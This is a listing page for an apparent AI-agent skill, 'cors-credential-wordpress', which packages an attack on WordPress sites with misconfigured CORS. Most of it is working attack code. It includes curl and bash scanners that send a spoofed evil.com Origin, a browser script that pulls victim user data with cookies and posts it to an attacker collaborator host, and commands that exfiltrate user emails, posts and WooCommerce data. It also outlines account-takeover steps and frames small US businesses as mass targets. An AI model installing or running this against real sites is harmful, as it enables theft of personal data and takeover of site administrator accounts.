ワンクリックで
cors-credential-wordpress
Exploit WP CORS credential reflection for data theft.
Codex または Claude でインストール この Prompt をコピーして Codex、Claude、または他のアシスタントに貼り付けると、Skill ページを確認してインストールできます。
メニュー
Exploit WP CORS credential reflection for data theft.
Codex または Claude でインストール この Prompt をコピーして Codex、Claude、または他のアシスタントに貼り付けると、Skill ページを確認してインストールできます。
Attack SAML SSO via XSW, signature strip, metadata extract.
Chain multiple vulns into critical impact attack paths.
Execute optimal kill chains for WordPress full compromise.
Escape Docker containers to host root via 5 techniques.
Catalog: 25 attacks, 18 WP, 8 CORS to match findings.
7-phase pentest pipeline from passive recon to exploitation.
| name | cors-credential-wordpress |
| description | Exploit WP CORS credential reflection for data theft. |
| version | 1.0.0 |
| author | uphiago |
| license | MIT |
| platforms | ["linux"] |
| compatibility | Requires curl, nmap, python3, masscan, subfinder, httpx, nuclei |
| metadata | {"tags":["recon","cors","wordpress","credential-theft","ATO"],"category":"recon","related_skills":["wp-mass-recon","xmlrpc-exploitation","cross-attack-chains","wordpress-full-compromise"]} |
Detect, confirm, and exploit CORS credential reflection on WordPress REST API endpoints. CORS misconfiguration is one of the most common critical findings in US SMB WordPress sites (~7-8% of all WP targets), enabling cross-origin data exfiltration with victim cookies. Documents 8 CORS variants and full browser PoC construction.
wp-mass-recon flags a target with Access-Control-Allow-Credentials: true.terminal tool with curl and python3.web_extract or browser_navigate for browser PoC verification./wp-json/wp/v2/).# Quick detection
curl -skI "https://TARGET/wp-json/wp/v2/users" -H "Origin: https://evil.com" | grep -iE "access-control"
# Full CORS matrix (10 endpoints)
for ep in "users" "posts" "pages" "media" "comments" "categories" "tags" "settings" "plugins" "themes"; do
echo "=== /wp-json/wp/v2/$ep ==="
curl -skI "https://TARGET/wp-json/wp/v2/$ep" -H "Origin: https://evil.com" | grep -iE "access-control|http/"
echo ""
done
| Variant | Detection | Exploitability |
|---|---|---|
| Origin reflection + creds | Access-Control-Allow-Credentials: true + mirror Origin | Critical — full data theft |
| Null origin | Access-Control-Allow-Origin: null | High — sandboxed iframes |
| Wildcard no creds | Access-Control-Allow-Origin: * (no creds) | Info — public data only |
| Credentialed preflight | OPTIONS returns 200 + ACAC | High — if GET without preflight |
| Auth-only leak | CORS only on auth-protected endpoints | High — cookie theft |
| Multi-origin | Multiple origins reflected | Critical — broader attack surface |
| Plugin-specific CORS | CORS only on plugin namespace | Medium — plugin data |
| Staging-only CORS | Production has no CORS, staging does | Medium — dependent on staging access |
curl -skI "https://TARGET/wp-json/wp/v2/users" \
-H "Origin: https://evil.com" \
-H "User-Agent: Mozilla/5.0" 2>&1
Positive signals:
Access-Control-Allow-Origin: https://evil.com (mirrors attacker origin)Access-Control-Allow-Credentials: true (sends cookies cross-origin)Access-Control-Allow-Methods: GET (data exfiltration vector)#!/bin/bash
TARGET="$1"
ENDPOINTS=(
"wp/v2/users"
"wp/v2/posts"
"wp/v2/pages"
"wp/v2/media"
"wp/v2/comments"
"wp/v2/categories"
"wp/v2/tags"
"wc/v3/products"
"wc/v3/orders"
"gf/v2/forms"
"elementor/v1/globals"
"revslider/v1/slides"
)
for ep in "${ENDPOINTS[@]}"; do
code=$(curl -sk -o /dev/null -w "%{http_code}" --max-time 10 "https://$TARGET/wp-json/$ep")
if [[ "$code" == "200" ]]; then
cors=$(curl -skI --max-time 10 "https://$TARGET/wp-json/$ep" -H "Origin: https://evil.com" 2>/dev/null | grep -i "access-control-allow-credentials: true")
if [[ -n "$cors" ]]; then
echo "[CRITICAL] CORS ON: /wp-json/$ep — data accessible cross-origin"
fi
fi
done
<script>
fetch("https://TARGET/wp-json/wp/v2/users", {
credentials: "include",
headers: { "Origin": "https://evil.com" }
})
.then(r => r.json())
.then(data => {
fetch("https://YOUR_COLLABORATOR/log?d=" + btoa(JSON.stringify(data)));
});
</script>
# Exfiltrate users with emails
curl -sk "https://TARGET/wp-json/wp/v2/users?context=edit" \
-H "Origin: https://evil.com" | python3 -m json.tool | grep -E '"id"|"name"|"slug"|"email"|"roles"'
# Exfiltrate all posts
curl -sk "https://TARGET/wp-json/wp/v2/posts?per_page=100" \
-H "Origin: https://evil.com" | python3 -c "
import sys, json
posts = json.load(sys.stdin)
for p in posts:
print(f\"{p['id']}: {p['title']['rendered']}\")
" 2>/dev/null
# Exfiltrate WooCommerce products
curl -sk "https://TARGET/wp-json/wc/v3/products" \
-H "Origin: https://evil.com" | python3 -m json.tool 2>/dev/null | head -50
admin@target.com)credentials: "include" sends WP auth cookie/wp-admin/ as victimSameSite=Lax or SameSite=Strict cookies won't send cross-origin even with CORS. Check cookie attributes in browser.Origin header or block cross-origin requests. Test from non-Cloudflare IP.Access-Control-Allow-Origin: * without credentials — this is public data, not a vulnerability. The key is Access-Control-Allow-Credentials: true.Access-Control-Allow-Credentials: true AND an Access-Control-Allow-Origin that matches the attacker's origin (not *).